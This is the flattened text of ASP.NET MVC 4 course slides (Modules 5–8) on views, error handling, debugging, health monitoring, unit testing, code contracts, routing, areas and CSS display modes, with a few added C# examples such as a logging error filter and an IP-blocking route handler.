EmailDisplayer to DisplayTemplates under Shared or
specific view folder
<a href="mailto:@Model">@Model</a>
EmailDisplayer
To explicitly specify the view to use
@Html.DisplayFor(model => model.Email, "EmailDisplayer")
ASP.NET MVC Templates - http://bradwilson.typepad.com/blog/2009/10/aspnet-mvc-2-templates-part-1-introduction.html/
MVC Views
5. 10
Defining Custom Editors
MVC Model
Associate a web user control with a property
[UIHint("RatingsDropDown")]
public string Rating { get; set; }
MVC View
Add the partial view (RatingsDropDown.cshtml) in EditorTemplates
@Html.DropDownList("", new SelectList(new [] {
"Excellent", "Good", "Average", "Poor" }, Model))
Generate the editor for the property
@Html.EditorFor(model => model.Rating)
5. 11
MVC Views
Html.RenderPartial (faster) and Html.Partial
Renders the specified partial view
@model Customer
<!-- details of a customer -->
<h2>Orders</h2>
@{ Html.RenderPartial("_ListOrders"); }
@Html.Partial("_ListOrders")
Partial view file: _ListOrders.cshtml
Note: RenderPartial writes directly to the response stream so it is faster. Partial returns a string so it can be used in a Razor expression.
When a partial view is created it gets its own copy of the ViewBag
so if it changes the ViewBag then the parent's copy is not affected
But changes to the Model do affect the parent!
You can explicitly pass a subset of the parent's Model
@{ Html.RenderPartial("_ListOrders", subsetOfModel); }
RenderPartialExtensions.RenderPartial Method - http://msdn.microsoft.com/en-us/library/system.web.mvc.html.renderpartialextensions.renderpartial.aspx
5. 12
MVC Views
Html.ActionLink
Creates an anchor tag with a path defined by a route
that calls an action method on a controller
Text to show
Action name
Controller name (optional)
@Html.ActionLink("Show Blog", "ShowBlog", "Blog", null,
new { @class = "cool", target = "_blank" })
Route values
HTML attributes
Would render this onto the HTML page
<a href="/Blog/ShowBlog" target="_blank" class="cool">Show Blog</a>
...and when clicked would call this action method
public class BlogController : Controller {
public ActionResult ShowBlog() {
5. 13
MVC Views
Html.Action and Html.RenderAction
Calls an action method on the controller and returns
the results as a string into the current view
@model Customer
<!-- details of a customer -->
<h2>Orders</h2>
@Html.Action("ListOrders", Model)
public class CustomerController : Controller
{
[ChildActionOnly]
public PartialViewResult ListOrders(Customer c)
{
List<Order> orders = GetOrders(c.CustomerID);
return PartialView("_ListOrders", orders);
}
}
@{ Html.RenderAction("ListOrders", Model); }
Note: RenderAction returns the results directly to the response stream so provides better performance.
Useful if you need to get more data from the model
MVC Views
5. 14
ChildActionOnly Attribute
Designed for use with
Html.Action and Html.RenderAction
@Html.Action("GetMoreModelData")
These two methods can be used in a view to call back
to a controller action in order to get more model data
[ChildActionOnly]
public PartialViewResult GetMoreModelData()
An external call should not normally be allowed to
directly call these actions so we apply ChildActionOnly
But you cannot call an action with ChildActionOnly applied using
Ajax.ActionLink because it makes an external call so in this case
leave off the attribute
Using ChildActionOnly in MVC
http://stackoverflow.com/questions/10253769/using-childactiononly-in-mvc
MVC Views
5. 15
HTML5 Features for Accessibility
You can use HTML5 to improve accessibility
Give content elements descriptive names
Apply ARIA (Accessible Rich Internet Application) attributes
<!-- Rule 2A: "File" label via aria-labelledby -->
<li role="menuitem" aria-haspopup="true" aria-labelledby="fileLabel">
<span id="fileLabel">File</span>
<!-- Rule 2C: "New" label via Namefrom:contents -->
<li role="menuitem" aria-haspopup="false">New</li>
Use the new semantic markup elements appropriately, e.g.
article, aside, figcaption, figure, footer, header, hgroup,
mark, nav, section, time
Accessible Rich Internet Applications (WAI-ARIA) 1.0
http://www.w3.org/WAI/PF/aria/
HTML5 Part 1: Semantic Markup and Page Layout
http://blogs.msdn.com/b/jennifer/archive/2011/08/01/html5-part-1-semantic-markup-and-page-layout.aspx
6. 1
Module 6
Testing and Debugging ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Testing and Debugging ASP.NET MVC 4 Web Applications
6. 2
Contents
Topic
Slide
Error Handling
Debugging
Health Monitoring
Testing 13
System.Diagnostics.Contracts 24
Exam Topic: Prevent and troubleshoot runtime issues
Troubleshoot performance, security, and errors
Implement tracing, logging (including using attributes
for logging), and debugging (including IntelliTrace)
Enforce conditions by using code contracts
Enable and configure health monitoring (including
Performance Monitor)
Exam Topic: Design an exception handling strategy
Handle exceptions across multiple layers
Display custom error pages using global.asax or creating
your own HTTPHandler or set web.config attributes
Handle first chance exceptions
Exam Topic: Test a web application
Create and run unit tests, for example, use the Assert
class, create mocks
Create and run web tests
Error Handling
6. 3
Defining Custom Errors
customErrors element can redirect unhandled .NET
exceptions and HTTP status code errors
<customErrors defaultRedirect="CustomErrorView"
mode="RemoteOnly" >
<error statusCode="404" redirect="Errors/Error404"/>
<!-- if using IE, switch off friendly errors to see this working -->
<error statusCode="500" redirect="Errors/Error500"/>
</customErrors>
Mode: Off (default), On, RemoteOnly
When Off, unhandled errors cause ASP.NET to generate an error
page that shows code including the line that caused the error
You can detect if it is on at runtime by using
HttpContext.IsCustomErrorEnabled
Error Handling
6. 4
Global Filters
Global filters are useful to set up global error handlers
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute
{
ExceptionType = typeof(DivideByZeroException),
View = "CustomException"
});
}
Exercise 1: Creating a Global Action Filter
http://msdn.microsoft.com/en-us/vs2010trainingcourse_aspnetmvcglobalanddynamicactionfilters_topic2.aspx
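A global filter that combines the HandleErrorAttribute and HttpContext.IsCustomErrorEnabled covered above, as an added example that is not from the courseware: full exception detail goes to the server-side trace, and the browser gets only a generic view with a reference id. The names LoggingHandleErrorAttribute, the "Error" view and the "ErrorId" key are assumptions.

```csharp
using System;
using System.Diagnostics;
using System.Web;
using System.Web.Mvc;

// Hypothetical filter name; extends the HandleErrorAttribute used on the slide.
public class LoggingHandleErrorAttribute : HandleErrorAttribute
{
    public override void OnException(ExceptionContext filterContext)
    {
        if (filterContext == null) throw new ArgumentNullException("filterContext");

        // Child actions report through the parent request; skip errors already handled.
        if (filterContext.IsChildAction || filterContext.ExceptionHandled) return;

        Exception ex = filterContext.Exception;

        // Same scope as the base class: HTTP 500 errors of the configured ExceptionType.
        if (new HttpException(null, ex).GetHttpCode() != 500) return;
        if (!ExceptionType.IsInstanceOfType(ex)) return;

        string controller = (string)filterContext.RouteData.Values["controller"];
        string action = (string)filterContext.RouteData.Values["action"];

        // Reference id ties the generic page the user sees to the detailed log entry.
        string errorId = Guid.NewGuid().ToString("N");
        Trace.TraceError("Error {0} in {1}/{2}: {3}", errorId, controller, action, ex);

        // Custom errors disabled for this request (for example a local request
        // under RemoteOnly): leave the exception unhandled so the developer
        // still sees the detailed ASP.NET error page.
        if (!filterContext.HttpContext.IsCustomErrorEnabled) return;

        var viewData = new ViewDataDictionary<HandleErrorInfo>(
            new HandleErrorInfo(ex, controller, action));
        viewData["ErrorId"] = errorId; // the view should show this id, not Model.Exception

        filterContext.Result = new ViewResult
        {
            ViewName = View,       // defaults to "Error"
            MasterName = Master,
            ViewData = viewData,
            TempData = filterContext.Controller.TempData
        };
        filterContext.ExceptionHandled = true;
        filterContext.HttpContext.Response.Clear();
        filterContext.HttpContext.Response.StatusCode = 500;
        // Stop IIS from replacing the response with its own error page.
        filterContext.HttpContext.Response.TrySkipIisCustomErrors = true;
    }
}

public static class FilterConfig
{
    public static void RegisterGlobalFilters(GlobalFilterCollection filters)
    {
        filters.Add(new LoggingHandleErrorAttribute { View = "Error" });
    }
}
```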
6. 5
Debugging
Configuring
Debugging for a web site is
controlled via two settings
Project Properties, Web, Debuggers,
ASP.NET (enabled by default)
Web.config (disabled by default)
<compilation debug="true" />
In Machine.config, if deployment is
set to retail then debug and trace
output is disabled and custom
errors are always on
<system.web>
<deployment retail="true" />
</system.web>
Debugging
6. 6
When Exceptions are Thrown
If you have written exception handling code but need to monitor
the internal state of your application when a CLR exception is
thrown, choose Debug-Exceptions and select the Thrown check box
Debugging
6. 7
Remote Sites
Visual Studio and IIS on different machines
\Program Files\Microsoft Visual Studio 10.0\Common7\IDE\Remote Debugger\x86\msvsmon.exe
Run on the remote server prior to debugging (no need to install)
Msvsmon started a new server named user@machine
Administrative rights allow debugging under a different identity
Both machines must be in the same domain or workgroup
Remote debugging with Visual Studio 2010
http://www.codeproject.com/Articles/146838/Remote-debugging-with-Visual-Studio-2010
Debugging
6. 8
Client-Side Script
By default, client-side script debugging is disabled in
Internet Explorer
Unselect the box to enable debugging
6. 9
Health Monitoring
What Is It?
Events can be intercepted and recorded throughout the
lifetime of an application
Starting or ending a Web application
Successful and unsuccessful authentication attempts
ASP.NET errors
Custom application events
Events inherit from WebBaseEvent
Derived classes include: WebManagementEvent, WebAuditEvent,
WebRequestEvent, WebHeartBeatEvent, WebBaseErrorEvent,
WebErrorEvent, WebRequestErrorEvent, and so on
ASP.NET includes several event providers that listen to
those events (next slide)
6. 10
Health Monitoring
Event Providers
All inherit from abstract WebEventProvider class
Override ProcessEvent method to implement your own
EventLogWebEventProvider
Writes to a Windows event log
SqlWebEventProvider
Writes to SQL Server Express ASPNETDB in
App_Data folder by default
WmiWebEventProvider
Writes to WMI
SimpleMailWebEventProvider
TemplatedMailWebEventProvider
Sends an e-mail message
TraceWebEventProvider
Writes to the ASP.NET Trace
Providers are not configured and do not subscribe to
any events by default
Except EventLogWebEventProvider, which is configured to write
exceptions and failed security audits to event log
Health Monitoring
6. 11
Configuring
Configured in the <healthMonitoring> section
<healthMonitoring heartBeatInterval="5" enabled="true">
<providers>
Configure which providers are available and where they
will write to
<bufferModes>
Configure how providers are buffered so that they are
transmitted in batches to avoid overloading the system
<eventMappings>
Associates event names (such as All Errors and Failure
Audits) with the classes that implement them
<rules>
Maps event types with event providers
<profiles>
Configure how many events can occur within a specific
time limit
minInterval
Before another event is logged (non-critical use higher values)
Health Monitoring
6. 12
Custom Extensions
Create custom extensions with IWebEventCustomEvaluator
Allows enabling or disabling the firing of a specific event
Especially useful when you implement your own custom event and
want to control the rate at which it is sent to the related provider
for processing
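using System.Web.Management;
public class SampleWebBaseEvent : WebBaseEvent, IWebEventCustomEvaluator
{
    // WebBaseEvent has no parameterless constructor
    public SampleWebBaseEvent(string message, object source, int eventCode)
        : base(message, source, eventCode) { }
    public bool CanFire(WebBaseEvent e, RuleFiringRecord rule)
    {
        // return true when you want your rule to fire
        return true;
    }
}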
IWebEventCustomEvaluator Interface
http://msdn.microsoft.com/en-us/library/system.web.management.iwebeventcustomevaluator.aspx
6. 13
Testing
Types of Tests
Test Level | Description
Unit | AKA component testing, refers to tests that verify the functionality of a specific section of code, usually at the function level. In an object-oriented environment, this is usually at the class level, and the minimal unit tests include the constructors and destructors.
Integration | Any type of software testing that seeks to verify the interfaces between components against a software design
System | Tests a completely integrated system to verify that it meets its requirements
Acceptance | The system is delivered to the user for Acceptance testing
Regression | Finding defects after a major code change has occurred
Performance | Executed to determine how a system or sub-system performs in terms of responsiveness and stability under a particular workload
Load | Testing that the system can continue to operate under a specific load, whether that be large quantities of data or a large number of users
Stress | Test reliability under unexpected or rare workloads
Testing
6. 14
Unit Testing Overview
Developers are responsible for testing their code prior
to alpha or beta releases
Informal process, includes walking through the code line by line
using a test harness used to simulate standard user interaction
Formal process, uses a Unit Test that isolates the code to be
tested and tests all conditions of that unit, which can be:
Manual, documented and executed by the developer
Automated, test code that is used to exercise a portion of
application code
Unit Testing Limits:
Helps ensure that each unit of code works as intended
Does not cover integration, UI, load, or performance
Testing
6. 15
Writing a Unit Test for MS Test
Write the test method to initialize appropriate values,
call the method, and then make assertions
[TestMethod]
public void AddNumbersTest()
{
var target = new CalculatorEngine(); // ARRANGE
int a = 2;
int b = 3;
int expected = 5;
int actual;
actual = target.AddNumbers(a, b); // ACT
Assert.AreEqual(expected, actual); // ASSERT
}
public class CalculatorEngine
{
public int AddNumbers(int a, int b)
{
return a * b; // multiplies instead of adding, so AddNumbersTest fails (2 * 3 = 6, expected 5)
}
}
Testing
6. 16
Unit Testing MVC
Unit tests are easy to create
[TestMethod]
public void TestDetailsView() {
    var controller = new ProductController();
    // To test that the correct view is being chosen
    var result = controller.Details(2) as ViewResult;
    Assert.AreEqual("Details", result.ViewName);
    // To test that the correct model is being passed
    var product = (Product)result.ViewData.Model;
    Assert.AreEqual("Laptop", product.Name);
}
Creating Unit Tests for ASP.NET MVC Applications
http://www.asp.net/mvc/tutorials/creating-unit-tests-for-asp-net-mvc-applications-cs
Testing
6. 17
Assert Class
Fail, Inconclusive, IsTrue, IsFalse, IsNull, IsNotNull,
IsInstanceOfType, IsNotInstanceOfType
The Assert class throws an AssertFailedException to signal a
failure which should not be captured because it is handled by
the unit test engine to indicate an assert failure
AreEqual / AreNotEqual
The two parameters have equivalence (internally uses Equals)
Assert.AreEqual(expected, actual);
Do NOT call Equals directly; this method is inherited from
Object and is not designed for use with unit testing
AreSame / AreNotSame
The two parameters (expected, actual) refer to the same object
Assert Class
http://msdn.microsoft.com/en-us/library/microsoft.visualstudio.testtools.unittesting.assert.aspx
Testing
6. 18
Microsoft Fakes Framework
Uses stubs and shims to let you easily isolate
components under test from the environment
They are small pieces of code that take the place of another
component during testing
Many methods return different results dependent on external
conditions, but a stub or shim is under the control of your test
and can return consistent results at every call, and you can run
tests even if the other components are not working yet
Testing
6. 19
Techniques for Removing Dependencies (Stub)
If you control the code, you should define interfaces
for any components you have dependencies on
public interface ICalculator {
    int Add(int a, int b); // interface members take no access modifier
}
public class RealCalc : ICalculator {
    public int Add(int a, int b) {
        return a + b; // stands in for the real implementation
    }
}
In tests, create a fake that implements the same
interface and make it return consistent results
public class FakeCalc : ICalculator {
    public int Add(int a, int b) {
        return 5; // illustrative fixed result
    }
}
var dependency = new FakeCalc();
var result = dependency.Add(2, 3);
Testing
6. 20
Techniques for Removing Dependencies (Shim)
If you don't control the code and it doesn't implement
an interface
public class RealCalc {
    public int Add(int a, int b) {
        return a + b; // stands in for the real implementation
    }
}
Create a fake and a delegate with the same signature
as the method you need to call
public class FakeCalc {
    public int Add(int a, int b) {
        return 5; // illustrative fixed result
    }
}
var dependency = new FakeCalc();
var delegateToAdd = new Func<int, int, int>(dependency.Add);
var result = delegateToAdd(2, 3);
6. 21
Testing
Stub and Shim Types
To use stubs, your application has to be designed so
that the different components are not dependent on
each other, but only dependent on interface definitions
Use shims to isolate your code from assemblies that
are not part of your solution
Shim types provide a mechanism to detour any .NET method to
a user defined delegate
Shim types are code-generated by the Fakes generator, and
they use delegates, which we call shim types, to specify the
new method implementations
Shim class names are made up by prefixing Fakes.Shim to the
original type name
Using stubs to isolate your application from other assemblies for unit testing
http://msdn.microsoft.com/en-us/library/hh549174.aspx
Using shims to isolate your application from other assemblies for unit testing
http://msdn.microsoft.com/en-us/library/hh549176.aspx
6. 22
Testing
Autofac FakeItEasy and Ninject
Given you have a system under test and a dependency
public class SystemUnderTest {
    // the property must be more accessible than its private setter
    public IDependency DependentObject { get; private set; }
    public SystemUnderTest(IDependency dependency) {
        this.DependentObject = dependency;
    }
}
public interface IDependency {
}
You can create your system under test with a fake
dependency automatically injected
[TestMethod]
public void Test()
{
    using (var fake = new AutoFake()) {
        // injects a fake IDependency into the SystemUnderTest constructor
        var sut = fake.Create<SystemUnderTest>();
    }
}
FakeItEasy
http://code.google.com/p/autofac/wiki/FakeItEasy
Ninject
http://www.ninject.org/
6. 23
System.Diagnostics.Contracts
What are Code Contracts?
using System.Diagnostics.Contracts;
Contracts allow you to express preconditions,
postconditions and object invariants in your code for
runtime checking, static analysis, and documentation
For example, you might have a Rational class to
represent rational numbers
For a rational number, the denominator must be non-zero
We can define a pre-condition to test for this in the constructor
public class Rational {
    public Rational(int numerator, int denominator) {
        Contract.Requires(denominator != 0);
    }
}
To use it you will need to follow links below:
Code Contracts User Manual
http://research.microsoft.com/en-us/projects/contracts/userdoc.pdf
Code Contracts for .NET
http://visualstudiogallery.msdn.microsoft.com/1ec7db13-3363-46c9-851f-1ce455f66970
System.Diagnostics.Contracts
6. 24
Contract Class
Assume(bool, string) method
Instructs code analysis tools to assume that a condition is true,
even if it cannot be statically proven to always be true, and
displays a message if the assumption fails
Ensures(bool) method
Specifies a postcondition contract for the enclosing method or
property
Requires<TException>(bool, string) method
Specifies a precondition contract for the enclosing method or
property, and throws an exception with the provided message if
the condition for the contract fails
Contract Class
http://msdn.microsoft.com/en-us/library/system.diagnostics.contracts.contract(v=vs.110).aspx
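An added example (not from the courseware) that extends the Rational class with the Requires<TException> and Ensures methods listed above, plus an object invariant. It assumes the Code Contracts tools from the earlier links are installed with runtime checking enabled; the Reciprocal and Parse methods and the exception messages are hypothetical.

```csharp
using System;
using System.Diagnostics.Contracts;

public class Rational
{
    private readonly int numerator;
    private readonly int denominator;

    public Rational(int numerator, int denominator)
    {
        // Precondition: throws ArgumentException with this message when violated.
        Contract.Requires<ArgumentException>(denominator != 0, "denominator must be non-zero");
        this.numerator = numerator;
        this.denominator = denominator;
    }

    public int Numerator { get { return numerator; } }

    public int Denominator
    {
        get
        {
            // Postcondition: callers may rely on a non-zero result.
            Contract.Ensures(Contract.Result<int>() != 0);
            return denominator;
        }
    }

    public Rational Reciprocal()
    {
        // Preconditions on public methods may only mention members the caller can see.
        Contract.Requires<InvalidOperationException>(Numerator != 0, "zero has no reciprocal");
        Contract.Ensures(Contract.Result<Rational>() != null);
        return new Rational(denominator, numerator);
    }

    // Hypothetical helper. Text that arrives from a request is validated with
    // ordinary checks that are always compiled in; whether contract checks run
    // depends on the project's runtime checking setting.
    public static Rational Parse(string text)
    {
        if (text == null) throw new ArgumentNullException("text");
        string[] parts = text.Split('/');
        int n, d;
        if (parts.Length != 2
            || !int.TryParse(parts[0], out n)
            || !int.TryParse(parts[1], out d)
            || d == 0)
        {
            throw new FormatException("expected <integer>/<non-zero integer>");
        }
        return new Rational(n, d);
    }

    // Checked by the rewriter at the end of every public method.
    [ContractInvariantMethod]
    private void ObjectInvariant()
    {
        Contract.Invariant(denominator != 0);
    }
}
```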
7. 1
Module 7
Structuring ASP.NET MVC 4
Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Structuring ASP.NET MVC 4 Web Applications
7. 2
Contents
Topic
Slide
SEO
Routing
MVC Areas 15
Exam Topic: Design and implement routes
Define a route to handle a URL pattern
Apply route constraints
Ignore URL patterns
Add custom route parameters
Define areas
Page 07-10 (position 9, 4284)
The MOC says to use MapHttpRoute
It should have said to use MapRoute
Note: MVC Site Map Provider is not an official component of
Visual Studio 2012 and ASP.NET 4.5 so it is NOT on the exam
SEO
7. 3
Search Engine Optimization
SEO Strategies
HTML
URLs
Anti-patterns
Improve the volume and quality of traffic to your
website from search engines
Control how search engines access and display web
content
Inform search engines about locations that are
available for indexing
SEO
7. 4
IIS SEO Toolkit
Site Analysis
Optimizes content, structure, and URLs for search engine
crawlers
Discovers problems that impact the user experience of website
Robot Exclusion
Manage all robots.txt files from within IIS Manager
Modify robots.txt files from a GUI interface
Sitemap and Site Index
Manage all sitemap files from within IIS Manager
Modify sitemap.xml files from a GUI interface
7. 5
Routing
Three Technologies Can Define Routes
MVC Default Route
routes.MapRoute(
    name: "Default",
    url: "{controller}/{action}/{id}",
    defaults: new { controller = "Home", action = "Index",
        id = UrlParameter.Optional }
);
Web API Default Route
config.Routes.MapHttpRoute(
    name: "DefaultApi",
    routeTemplate: "api/{controller}/{id}",
    defaults: new { id = RouteParameter.Optional }
);
Web Forms Custom Route
routes.MapPageRoute(
    routeName: "LoginRoute",
    routeUrl: "account/login",
    physicalFile: "~/login.aspx"
);
Routing
7. 6
Using the Default Route
The default MVC route
routes.MapRoute("Default", // route name
"{controller}/{action}/{id}", // URL pattern with route parameters
new { // route parameter defaults
controller = "Home", action = "Index",
id = UrlParameter.Optional }
);
Maps this HTTP request to the following parameters
GET http://www.contoso.com/Home/Index/3
{controller} = Home, {action} = Index, {id} = 3
So this method is executed on the controller
return (new HomeController()).Index(3);
ASP.NET MVC Routing Overview
http://www.asp.net/mvc/tutorials/asp-net-mvc-routing-overview-cs
7. 7
Routing
Action Method Parameters
The controller can define the Index method like this
public ActionResult Index(string id)
Or like this
public ActionResult Index()
Note: the id is available using RouteData.Values["id"]
But if the action method is defined like this
public ActionResult Index(int id)
an exception is thrown if the parameter is missing
To avoid an exception use int? or set a default value
public ActionResult Index(int? id)
public ActionResult Index(int id = 0)
7. 8
Routing
URL Patterns
Route definition | Example of matching URL
{controller}/{action}/{id} | /Products/show/beverages
{resource}.axd/{*pathInfo} | /WebResource.axd?d=123456...
{table}/Details.aspx | /Products/Details.aspx
blog/{action}/{entry} | /blog/show/123
{reporttype}/{year}/{month}/{day} | /sales/2008/1/5
{locale}/{action} | /US/show
{language}-{country}/{action} | /en-US/show
Route definition (IIS 6.0) | Example of matching URL
{controller}.mvc/{action}/{id} | /Products.mvc/show/beverages
ASP.NET Routing
http://msdn.microsoft.com/en-us/library/cc668201.aspx
7. 9
Routing
Variable Number of Segments
Route path that matches variable number of segments
query/{queryname}/{*queryvalues}
URL | Parameters
/query/select/bikes/onsale | queryname = "select", queryvalues = "bikes/onsale"
/query/select/bikes | queryname = "select", queryvalues = "bikes"
/query/select | queryname = "select", queryvalues = null
*queryvalues segment can be missing from a URL path without
needing to mark it as optional
You can only have one segment marked with * and it must be
the last segment
Routing
7. 10
Constraints
Routes can use constraints to differentiate
Without the constraint the first route would match both samples
routes.MapRoute(name: "ProductByIntegerRoute",
url: "product/{id}", // product/23
defaults: new { controller = "Product", action = "Details" },
constraints: new { id = @"^\d{1,}$" } // verbatim string: "\d" is not a valid escape in a regular literal
);
routes.MapRoute(name: "ProductByStringRoute",
url: "product/{name}", // product/apple
defaults: new { controller = "Product", action = "DetailsByName" }
);
public ActionResult Details(int id)
public ActionResult DetailsByName(string name)
Routing
7. 11
Scenarios When Routing Is Not Applied
Physical file matches
By default, routing does not handle requests that map to an
existing physical file on the Web server
Override the default behavior by setting the RouteExistingFiles
property of the RouteCollection object to true
Routing explicitly disabled for a URL pattern
Define a route and specify that the StopRoutingHandler class
should be used to handle that pattern
Use the RouteCollection.Ignore method (or the extension
method RouteCollectionExtensions.IgnoreRoute) to create
routes that use the StopRoutingHandler class
routes.Ignore("{resource}.axd/{*pathInfo}");
routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
Difference between RouteCollection.Ignore and RouteCollection.IgnoreRoute?
http://stackoverflow.com/questions/11544338/difference-between-routecollection-ignore-and-routecollection-ignoreroute
Routing
7. 12
How URLs are Matched to Routes
Matching a URL request to a route depends on all the
following conditions
The route patterns that you have defined or the default route
The order in which you added them to the Routes collection
Any default values that you have provided for a route
Any constraints that you have provided for a route
Whether you have defined routing to handle requests that
match a physical file
Route matching is tried from the first route to the last
route in the collection
When a match occurs, no more routes are evaluated
Routing
7. 13
Custom Route Handler
Create a custom route handler to perform additional
checks, for example, by country
Create a class that implements IRouteHandler
public class CountryProhibitionRouteHandler : IRouteHandler
The method GetHttpHandler must return IHttpHandler and
accept a single input parameter of type RequestContext
public IHttpHandler GetHttpHandler(RequestContext context)
Inherit from MvcHandler (which implements IHttpHandler)
public class IpBlockHandler : MvcHandler
IRouteHandler in ASP.NET MVC
http://keyvan.io/iroutehandler-in-asp-net-mvc
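An added example of the IP-based check this slide outlines (not code from the courseware or the linked article). The class name IpBlockRouteHandler is hypothetical; it derives from MvcRouteHandler, which implements IRouteHandler, so permitted requests still get the standard MvcHandler, and the blocked address is a constructed sample from a documentation range.

```csharp
using System.Collections.Generic;
using System.Net;
using System.Web;
using System.Web.Mvc;
using System.Web.Routing;

// Hypothetical route handler: rejects listed client addresses before any
// controller is created. Assumes .NET 4.5 for the IPv4-mapped helpers.
public class IpBlockRouteHandler : MvcRouteHandler
{
    private readonly HashSet<IPAddress> blocked = new HashSet<IPAddress>();

    public IpBlockRouteHandler(IEnumerable<string> blockedAddresses)
    {
        foreach (string text in blockedAddresses)
        {
            // IPAddress.Parse throws on a malformed entry, so a bad
            // configuration fails at start-up instead of silently allowing.
            blocked.Add(Normalize(IPAddress.Parse(text)));
        }
    }

    protected override IHttpHandler GetHttpHandler(RequestContext requestContext)
    {
        string raw = requestContext.HttpContext.Request.UserHostAddress;
        IPAddress client;

        // Fail closed: an address that cannot be parsed is treated as blocked.
        if (!IPAddress.TryParse(raw, out client) || blocked.Contains(Normalize(client)))
        {
            return new ForbiddenHandler();
        }
        return base.GetHttpHandler(requestContext); // the normal MvcHandler
    }

    // An IPv4-mapped IPv6 address and its plain IPv4 form are the same client,
    // so compare both in IPv4 form.
    private static IPAddress Normalize(IPAddress address)
    {
        return address.IsIPv4MappedToIPv6 ? address.MapToIPv4() : address;
    }

    private sealed class ForbiddenHandler : IHttpHandler
    {
        public bool IsReusable { get { return true; } }

        public void ProcessRequest(HttpContext context)
        {
            context.Response.StatusCode = 403;
            context.Response.TrySkipIisCustomErrors = true;
        }
    }
}

public static class RouteConfig
{
    public static void RegisterRoutes(RouteCollection routes)
    {
        routes.IgnoreRoute("{resource}.axd/{*pathInfo}");

        Route route = routes.MapRoute(
            name: "Default",
            url: "{controller}/{action}/{id}",
            defaults: new { controller = "Home", action = "Index", id = UrlParameter.Optional });

        // Constructed sample address (documentation range).
        route.RouteHandler = new IpBlockRouteHandler(new[] { "203.0.113.7" });
    }
}
```

UserHostAddress is the address of the directly connected peer, so behind a reverse proxy or load balancer it is the proxy's address rather than the end user's.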
Routing
7. 14
IIS URL Rewrite Module
IIS admins can create rules to map URLs
For SEO, to perform redirects, based on HTTP headers or server
variables (like IP addresses), stop requests, control access
URL rewriting differs from ASP.NET routing
URL rewriting processes incoming requests by actually changing
the URL before it sends the request to the Web page
URL rewriting typically does not have an API for creating URLs
that are based on your patterns so if you change a pattern, you
must manually update all hyperlinks that contain the original
With ASP.NET routing, the URL is not changed, because routing
can extract values from the URL
When you have to create a URL, you pass parameter values into
a method that generates the URL for you
Using the URL Rewrite Module
http://learn.iis.net/page.aspx/460/using-the-url-rewrite-module/
MVC Areas
7. 15
What are Areas?
The default ASP.NET MVC project structure can become
unwieldy so MVC lets you partition Web applications
into smaller units that are referred to as areas
An area is effectively an MVC structure inside an application
Right-click an MVC project and choose Add-Area...
MVC Areas
7. 16
Area Registration
When you add an area to a project, a route for the
area is defined in an AreaRegistration file
The route sends requests to the area based on the
request URL
To register routes for areas, you add code to the
Global.asax file that can automatically find the area
routes in the AreaRegistration file
AreaRegistration.RegisterAllAreas();
This is done automatically by Visual Studio
Organizing an ASP.NET MVC Application using Areas
http://msdn.microsoft.com/en-us/library/ee671793.aspx
MVC Areas
7. 17
Linking Between Areas
Html.ActionLink helper method
This will work inside an area
@Html.ActionLink("Show Blog", "ShowBlog", "Blog")
Outside the area we must also pass a routeValues instance (an
anonymous type with an "area" property with value of the area
name) and optionally any HTML attributes to set (usually null)
@Html.ActionLink("Show Blog", "ShowBlog", "Blog",
new { area = "hr" }, null)
To create a link inside an area to go back outside the area
@Html.ActionLink("Home Page", "Index", "Home",
new { area = "" }, null)
MVC Areas
7. 18
Controllers with Same Name
By default, controllers must have
unique names within an MVC project,
even with multiple areas
To reuse a controller name in an area you
must specify the root namespace when
registering the default route by passing an
array of string
routes.MapRoute("Default", // Route name
"{controller}/{action}/{id}", // URL
new { controller = "Home", action = "Index", id = "" }, // Defaults
new[] { "AreasDemoWeb.Controllers" } // Namespace
);
8. 1
Module 8
Applying Styles to ASP.NET
MVC 4 Web Applications
Developing ASP.NET MVC 4
Web Applications
Updated 11th April 2014
Applying Styles to ASP.NET MVC 4 Web Applications
8. 2
Contents
Topic
Slide
CSS Printing
CSS Media Queries
Display Modes
Browsers
Exam Topic: Plan an adaptive UI layout
Plan for running applications in browsers on multiple
devices (screen resolution, CSS, HTML)
Plan for mobile web applications
Exam Topic: Enhance application behavior and style
based on browser detection
Detect browser features and capabilities
Create a web application that runs across multiple
browsers and mobile devices
Vendor-specific CSS extensions
Exam Topic: Apply the user interface design for a web application
Create and apply styles by using CSS
Structure and lay out the user interface by using HTML
Implement dynamic page content based on a design
Exam Topic: Compose the UI layout of an application
Design layouts to provide visual structure
Implement master/application pages
8. 3
CSS
Printing
style and link elements support the MEDIA attribute,
which defines the output device for the style sheet
Values for MEDIA are screen (default), print and all
The print value specifies that the style sheet is used when the
page is printed; this value does not affect how the document
will be displayed onscreen
<style type="text/css" media="print">
div.page {
page-break-before: always;
}
</style>
Printing and Style Sheets
http://msdn.microsoft.com/en-us/library/ms530709(v=vs.85).aspx
CSS
8. 4
Media Queries
Media queries allow you to have different style sheets
for different scenarios
<link rel='stylesheet'
media='only screen and (max-width: 700px)'
href='css/narrow.css' />
<link rel='stylesheet'
media='only screen and (min-width: 701px) and (max-width: 900px)'
href='css/medium.css' />
The keyword only can also be used to hide style sheets from
older user agents. User agents must process media queries
starting with only as if the only keyword was not present.
What is the difference between screen and only screen in media queries?
http://stackoverflow.com/questions/8549529/what-is-the-difference-between-screen-and-only-screen-in-media-queries
CSS Media Queries & Using Available Space
http://css-tricks.com/css-media-queries/
Display Modes
8. 5
Using and Registering Display Modes
By default ASP.NET registers a (default) and a
mobile display mode
You can also create your own for more advanced customization
This creates a new display mode (inserted at the top of the
existing list) that will activate when the text "iPhone" is found
in the request's user-agent
using System;
using System.Web.WebPages;
DisplayModeProvider.Instance.Modes.Insert(0,
    new DefaultDisplayMode("iPhone") { ContextCondition =
        (ctx => ctx.Request.UserAgent != null && // header can be absent
            ctx.Request.UserAgent.IndexOf("iPhone",
                StringComparison.OrdinalIgnoreCase) >= 0) });
You can then create specific views for this type of device by
giving them names such as xyz.iphone.cshtml
DisplayModes in MVC 4
http://www.campusmvp.net/blog/displaymodes-in-mvc-4
ASP.NET MVC 4 (Part 2 - Mobile Features)
http://build-failed.blogspot.co.uk/2012/03/aspnet-mvc-4-part-2-mobile-features.html
Display Modes
8. 6
Testing Display Modes
To test the mobile option, hit F12 and bring up the
Developers Tools window
Set a fake user agent that matches a mobile device
